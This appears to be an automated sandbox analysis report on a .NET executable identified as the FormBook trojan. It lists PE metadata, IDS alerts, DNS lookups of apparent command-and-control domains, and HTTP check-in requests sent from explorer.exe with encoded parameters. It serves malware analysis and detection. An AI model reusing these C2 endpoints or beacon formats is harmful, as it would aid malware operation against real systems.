OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x39578	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3a000	0x10b38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x375d4	0x37600	False	0.82320912105	data	7.77367738512	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x3a000	0x10b38	0x10c00	False	0.0466417910448	data	4.00591685975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4c000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3a0fc	0x10828	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0x4a924	0x14	data
RT_VERSION	0x4a938	0x200	data	English	United States

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	roIhml
FileVersion	7, 0, 9, 0
CompanyName	km
ProductName	oj
ProductVersion	7, 0, 9, 0
FileDescription
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/29/21-04:39:51.905150	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49811	34.102.136.180	192.168.2.6
09/29/21-04:39:58.329883	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49812	80	192.168.2.6	108.179.246.105
09/29/21-04:39:58.329883	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49812	80	192.168.2.6	108.179.246.105
09/29/21-04:39:58.329883	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49812	80	192.168.2.6	108.179.246.105
09/29/21-04:40:19.314099	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.2.6	23.227.38.74
09/29/21-04:40:19.314099	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.2.6	23.227.38.74
09/29/21-04:40:19.314099	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.2.6	23.227.38.74
09/29/21-04:40:19.359274	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49817	23.227.38.74	192.168.2.6
09/29/21-04:40:35.112026	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49819	34.102.136.180	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2021 04:39:46.520317078 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.554671049 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:46.554898977 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.555294991 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.589448929 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:46.624685049 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:46.624744892 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:46.624964952 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.625030994 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.659334898 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:51.669807911 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.694152117 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:51.694314003 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.694509983 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.718749046 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:51.905149937 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:51.905251980 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:51.905471087 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.905558109 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.943809986 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:58.183557034 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:58.329395056 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:58.329543114 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:58.329883099 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:58.477359056 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:58.830939054 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:59.016927958 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:59.913381100 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:59.913561106 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:59.913786888 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:59.913851976 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:40:19.296732903 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.313730001 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.313925028 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.314099073 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.332310915 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359273911 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359308958 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359329939 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359353065 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359370947 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359388113 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359402895 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359446049 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.359787941 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.359807014 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:24.495208979 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.634416103 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.634582996 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.634798050 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.772772074 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.774866104 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.774931908 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.774966955 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.775007963 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.775029898 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.775108099 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.775249958 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.775326014 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.913644075 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:34.940711021 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:34.965224981 CEST	80	49819	34.102.136.180	192.168.2.6
Sep 29, 2021 04:40:34.965356112 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:34.965442896 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:34.989929914 CEST	80	49819	34.102.136.180	192.168.2.6
Sep 29, 2021 04:40:35.112025976 CEST	80	49819	34.102.136.180	192.168.2.6
Sep 29, 2021 04:40:35.112051010 CEST	80	49819	34.102.136.180	192.168.2.6
Sep 29, 2021 04:40:35.112236023 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:35.112266064 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:35.153801918 CEST	80	49819	34.102.136.180	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2021 04:38:21.289735079 CEST	54513	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:38:21.316379070 CEST	53	54513	8.8.8.8	192.168.2.6
Sep 29, 2021 04:38:53.534001112 CEST	62044	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:38:53.560837030 CEST	53	62044	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:16.562288046 CEST	63791	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:16.581655025 CEST	53	63791	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:17.116262913 CEST	64267	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:17.136373043 CEST	53	64267	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:17.566478014 CEST	49448	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:17.585911989 CEST	53	49448	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:17.891179085 CEST	60342	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:17.912511110 CEST	53	60342	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:18.365947962 CEST	61346	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:18.383519888 CEST	53	61346	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:18.525990009 CEST	51774	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:18.553735018 CEST	53	51774	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:18.866934061 CEST	56023	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:18.886312008 CEST	53	56023	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:19.332819939 CEST	58384	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:19.350608110 CEST	53	58384	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:20.602617025 CEST	60261	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:20.621990919 CEST	53	60261	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:21.473272085 CEST	56061	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:21.490623951 CEST	53	56061	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:21.820036888 CEST	58336	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:21.839320898 CEST	53	58336	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:37.436947107 CEST	53781	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:37.458313942 CEST	53	53781	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:46.474432945 CEST	54064	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:46.513228893 CEST	53	54064	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:50.944976091 CEST	52811	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:50.965353012 CEST	53	52811	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:51.632262945 CEST	55299	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:51.667891979 CEST	53	55299	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:58.158402920 CEST	63745	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:58.181813002 CEST	53	63745	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:03.864523888 CEST	50055	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:03.912084103 CEST	53	50055	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:05.834548950 CEST	61374	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:05.853976965 CEST	53	61374	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:07.588280916 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:07.623198986 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:13.956512928 CEST	63307	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:14.215470076 CEST	53	63307	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:19.258958101 CEST	49694	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:19.295556068 CEST	53	49694	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:24.376988888 CEST	54982	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:24.494050026 CEST	53	54982	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:29.788321018 CEST	50010	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:29.824935913 CEST	53	50010	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:34.906407118 CEST	63718	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:34.940052032 CEST	53	63718	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 29, 2021 04:39:46.474432945 CEST	192.168.2.6	8.8.8.8	0xeb09	Standard query (0)	www.bellaalubo.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:39:51.632262945 CEST	192.168.2.6	8.8.8.8	0x2235	Standard query (0)	www.behiscalm.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:39:58.158402920 CEST	192.168.2.6	8.8.8.8	0xeb84	Standard query (0)	www.productprinting.online	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:03.864523888 CEST	192.168.2.6	8.8.8.8	0xe0e8	Standard query (0)	www.thehauntdepot.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:13.956512928 CEST	192.168.2.6	8.8.8.8	0x2b4d	Standard query (0)	www.miyonbuilding.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:19.258958101 CEST	192.168.2.6	8.8.8.8	0xaf97	Standard query (0)	www.corlora.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:24.376988888 CEST	192.168.2.6	8.8.8.8	0xc0a1	Standard query (0)	www.jspagnier-graveur.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:29.788321018 CEST	192.168.2.6	8.8.8.8	0xbd4d	Standard query (0)	www.pastlinks.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:34.906407118 CEST	192.168.2.6	8.8.8.8	0x7e02	Standard query (0)	www.chinatowndeliver.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	www.bellaalubo.com	www93.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	www93.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Sep 29, 2021 04:39:51.667891979 CEST	8.8.8.8	192.168.2.6	0x2235	No error (0)	www.behiscalm.com	behiscalm.com		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:51.667891979 CEST	8.8.8.8	192.168.2.6	0x2235	No error (0)	behiscalm.com		34.102.136.180	A (IP address)	IN (0x0001)
Sep 29, 2021 04:39:58.181813002 CEST	8.8.8.8	192.168.2.6	0xeb84	No error (0)	www.productprinting.online	productprinting.online		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:58.181813002 CEST	8.8.8.8	192.168.2.6	0xeb84	No error (0)	productprinting.online		108.179.246.105	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:03.912084103 CEST	8.8.8.8	192.168.2.6	0xe0e8	Name error (3)	www.thehauntdepot.com	none	none	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:14.215470076 CEST	8.8.8.8	192.168.2.6	0x2b4d	Name error (3)	www.miyonbuilding.com	none	none	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:19.295556068 CEST	8.8.8.8	192.168.2.6	0xaf97	No error (0)	www.corlora.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:40:19.295556068 CEST	8.8.8.8	192.168.2.6	0xaf97	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:24.494050026 CEST	8.8.8.8	192.168.2.6	0xc0a1	No error (0)	www.jspagnier-graveur.com	comingsoon.namebright.com		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:40:24.494050026 CEST	8.8.8.8	192.168.2.6	0xc0a1	No error (0)	comingsoon.namebright.com	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:40:24.494050026 CEST	8.8.8.8	192.168.2.6	0xc0a1	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		54.85.93.188	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:24.494050026 CEST	8.8.8.8	192.168.2.6	0xc0a1	No error (0)	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		23.20.208.181	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:29.824935913 CEST	8.8.8.8	192.168.2.6	0xbd4d	Name error (3)	www.pastlinks.com	none	none	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:34.940052032 CEST	8.8.8.8	192.168.2.6	0x7e02	No error (0)	www.chinatowndeliver.com	chinatowndeliver.com		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:40:34.940052032 CEST	8.8.8.8	192.168.2.6	0x7e02	No error (0)	chinatowndeliver.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.bellaalubo.com

www.behiscalm.com

www.productprinting.online

www.corlora.com

www.jspagnier-graveur.com

www.chinatowndeliver.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49802	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:39:46.555294991 CEST	6323	OUT	GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6/3F+1gpc5iCodVhQ8Dw== HTTP/1.1 Host: www.bellaalubo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:39:46.624685049 CEST	6325	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 29 Sep 2021 02:39:46 GMT Content-Length: 0 Connection: close location: https://www.bellaalubo.com/mjyv?A6AlK=e0GlzbR8AB8XET3&0pK81=L63r4gynR7T+uFffjQ1lMOoDpS8QK6GZHdtzK1OvDTkBgsUpz0OkUj6%2F3F+1gpc5iCodVhQ8Dw%3D%3D strict-transport-security: max-age=120 x-wix-request-id: 1632883186.572207666983115271 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgNejB6IPiH951PfWDw1jqb,qquldgcFrj2n046g4RNSVKSF4mMIGztppd+i2ecXTRlYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRaljekZC98cC4SZu7KJhEf4dWXfNlf1mX2p3mzZLvRoiy83fKEXQvQlSAkB/lstal9RyJsvviwg8ecWWqIsur7ZjM=,2UNV7KOq4oGjA5+PKsX47DNXPpcHBYLh9Govhfd9I4xYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,l7Ey5khejq81S7sxGe5Nk/MzqevR6djLa1zEmOJAB8iTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UvY1uiXtmgas6aI2l+unv0jDpKP1Mdvk8URFUJD8JTxFdGu3cQmuVVgGLeHJWl2bH2yWikl2EP5bJKtoyukhjw== Cache-Control: no-cache X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49811	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:39:51.694509983 CEST	6343	OUT	GET /mjyv/?0pK81=K9FJa1rwSUAAa7/ViuRfbodFPMpyTpIbchforJThhUgcBsFNcj++iNtzjC9b847wWXILaTLWiQ==&A6AlK=e0GlzbR8AB8XET3 HTTP/1.1 Host: www.behiscalm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:39:51.905149937 CEST	6344	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 29 Sep 2021 02:39:51 GMT Content-Type: text/html Content-Length: 275 ETag: "61525017-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49812	108.179.246.105	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:39:58.329883099 CEST	6344	OUT	GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== HTTP/1.1 Host: www.productprinting.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 29, 2021 04:39:59.913381100 CEST	6345	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 29 Sep 2021 02:39:58 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://productprinting.online/mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=dI0EVfu3O8PRZHJYFiskZOhLU8OYvItQe6Md7KpFhlubQ63bIpFTgfxbi1sf92w0hSX5JIFUxQ== Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49817	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 04:40:19.314099073 CEST	6368	OUT	GET /mjyv/?A6AlK=e0GlzbR8AB8XET3&0pK81=FJb0UZ01VWieyk9Q9MfOW6tWVMxtPQ65AKmCznKsSr2tdhgz0LXvq/VY7gtgl/S7OsM4m26iBg== HTTP/1.1 Host: www.corlora.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
